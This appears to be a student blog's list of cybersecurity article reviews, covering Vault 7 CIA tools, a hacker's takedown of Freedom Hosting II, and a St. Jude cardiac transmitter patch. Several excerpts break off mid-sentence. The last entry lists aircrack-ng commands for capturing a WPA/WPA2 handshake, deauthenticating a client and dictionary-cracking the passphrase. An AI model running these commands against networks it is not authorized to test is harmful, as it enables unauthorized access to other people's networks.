Posts

Image
Vault 7: CIA Hacking Tools Revealed: Article Review 18  • The first full part of the series of leaks is called “Year Zero” with 8,761 documents and files from the CIA’s Center for Cyber Intelligence at Langley, Virginia • Since 2001 the CIA (famous for its drone and hacker fleets) gained political and budgetary preeminence over the NSA freeing the agency’s hacking division from having to disclose its controversial ops to the NSA the primary bureaucratic rival in order to draw on the NSA’s hacking capacities • "Weeping Angel", was developed by the CIA's Embedded Devices Branch (EDB), which infests smart TVs, transforming them into covert microphones developed with the UK MI5/BTSS Cyber 'weapons' are not possible to keep under effective control because they are comprised entirely of computer programs and can be pirated and copied with no marginal cost The following is an example of source code and its notes from a Vault 7 article on how to hack the Samsung F8

Snort for Rookies

Image
Article Review 18: We Talked to the Hacker Who Took Down a Fifth of the Dark Web ·               An Anonymous hacker took down the server Freedom Hosting II which was a hosting provider for 20% of all dark web sites ·             Initially didn’t want to take down FH2 but after allegedly finding several large child pornography sites using more than FH2’s states allowance of 256MB per site decided to take it down. Ten child pornography sites had 30GB of files implying that these sites paid for hosting and the admins knew of the illegal sites. ·              It took 21 steps to take down  ·          The hacker released a dump of system files from FH2 but not user data.   The Feds have tried to identify individual users by deploying malware to grab visitors’ IP addresses because even when in control of a Tor hidden service law enforcement can’t usually see the location of each user. Summary: There are vigilante hackers taking down child pornography sites on

St. Jude Medical Patches Cardiac Machine's Cybersecurity Flaw Article Review

1.St. Jude Medical created a software patch at the U.S. FDA’s warning that their Merlin@home Transmitter that communicates with cardiac devices could be hacked 2.The transmitter wirelessly sends data on the patient with the implanted cardiac device (like a pacemaker)to a physician over their Merlin.net patient care portal 3.A hacker has the capability without this patch to modify the commands in that implanted device, administer unnecessary pacing or shocks and rapidly deplete the battery  4.The FDA says that “the health benefits to patients from continued use of the device [Merlin@home Transmitter] outweigh the cybersecurity risks” Summary: I thought it was interesting to find that now the FDA is getting involved in cybersecurity issues because of the ramifications of hacking medical devices. We will definitely be seeing more of these software patches released in the following months. Hackers are generally financially motivated and wouldn’t have an interest in ha
Reference 1 for Cracking WPA/WPA2 To recover the pass phrase from a WPA/WPA2 (TKIP) secured wireless network where the topology includes an Access Point and at least one connected client use the following commands sudo airmon-ng start wlan0 (create a monitoring interface) sudo airodump-ng mon0 (locate the wireless network and obtain information used to recover the WPA Passphrase) airodump-ng –bssid 00:1C:F0:AE:83:F8 –channel 1  (present info only for the network of interest) aireplay-ng -0 15 -a 00:1C:F0:AE:83:F8 – c 00:27:19:FF:F3:14 mon0 (launch a de-authentication attack against the connected client) airodump-ng –bssid 00:1C:F0:AE:83:F8 –channel 1 –write WPAattack mon0 (recover the passcode) aircrack-ng WPAattack -w /home/attacker/passlist.txt (tell aircrack to launch the dictionary attack with the library) Summary: Be safe. These commands allow the user to access pass phrases for the WPA/WPA2 wireless networks. Though WPA/WPA2 is significantly more